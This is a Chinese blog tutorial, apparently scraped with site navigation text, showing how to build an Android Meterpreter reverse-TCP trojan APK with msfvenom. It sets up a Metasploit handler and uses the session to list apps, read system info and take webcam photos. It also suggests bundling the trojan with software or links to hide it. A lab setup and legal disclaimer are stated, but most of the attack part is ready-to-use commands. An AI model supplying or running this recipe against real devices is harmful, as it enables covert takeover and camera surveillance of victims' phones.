2026/1/12 15:59:00
网站建设
项目流程
深圳app网站建设哪家好,苍南县龙港哪里有做网站,网络推广员招聘,成都互联网公司排名文章目录一、前言二、演示环境三、渗透过程#xff08;一#xff09;查询虚拟机中kali的IP#xff08;二#xff09;使用root权限#xff08;三#xff09;生成木马#xff08;四#xff09;打开MSF#xff08;五#xff09;配置攻击载荷#xff08;七#xff09;控…文章目录一、前言二、演示环境三、渗透过程一查询虚拟机中kali的IP二使用root权限三生成木马四打开MSF五配置攻击载荷七控制靶机的指令1、查看对方手机系统信息2、查看对方手机安装哪些app文件3、控制摄像头拍摄一张照片一、前言MSF全称为Metasploit Framework是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中其显示的内网IP无法被外网的安卓手机S直接访问所以不能直接将文章方法应用于外网。该实验为模拟环境未经授权的渗透都是违法行为我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统入侵渗透更高级的系统需要更加专业的知识再加上只能进行内网渗透所以这种方法很难进行违法渗透二、演示环境攻击主机虚拟机 kali IP:192.168.147.129靶机联想模拟器 安卓9三、渗透过程一查询虚拟机中kali的IP我先在终端中输入ifconfig查询了自己虚拟机中kali的ip地址如下图可知ip为192.168.147.129二使用root权限我先在终端输入su root输入自己的密码使用root权限然后在此权限下进行以下操作。三生成木马这个木马是放在靶机上的目的是与攻击主机进行连接使攻击主机控制靶机为了隐蔽我们可以把木马与软件或网站链接捆绑在一起神不知鬼不觉地使木马在靶机上运行起来这也就是为什么尽量不要在第三方网站下载破解软件不要随便点击不明网站的原因。这里我为了追求方便就直接裸木马输入msfvenom -p android/meterpreter/reverse_tcp LHOST192.168.147.129 LPORT6666 R 木马.apk这里的 LHOST换成自己kali的ipLPORT换成一个没被占用的端口后面的木马安装包apk的名称自定义生成的安装包apk会默认生成在桌面的主文件夹中并把此木马放在靶机上在靶机上安装后软件名默认为MainActivity先不要运行如下图四打开MSF我继续在终端输入msfconsole打开SF这里打开之后显示的图案是随机的五配置攻击载荷我接着在终端中输入以下命令进行配置一条一条输入use exploit/multi/handler //选择模块 set payload android/meterpreter/reverse_tcp //选择攻击模块 set LHOST 192.168.147.129 //与你自己kali的IP保持一致 set LPORT 6666 //与你之前设置的端口保持一致###六运行配置完之后我输入run运行然后双击靶机上的木马使它在靶机上运行出现类似如下图则代表渗透成功七控制靶机的指令1、查看对方手机系统信息命令sysinfo2、查看对方手机安装哪些app文件命令app_list3、控制摄像头拍摄一张照片注意要先给虚拟机摄像头权限安装上相机有前置摄像头开关的电脑要打开它命令webcam_snap也是成功拍到了我的键盘网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取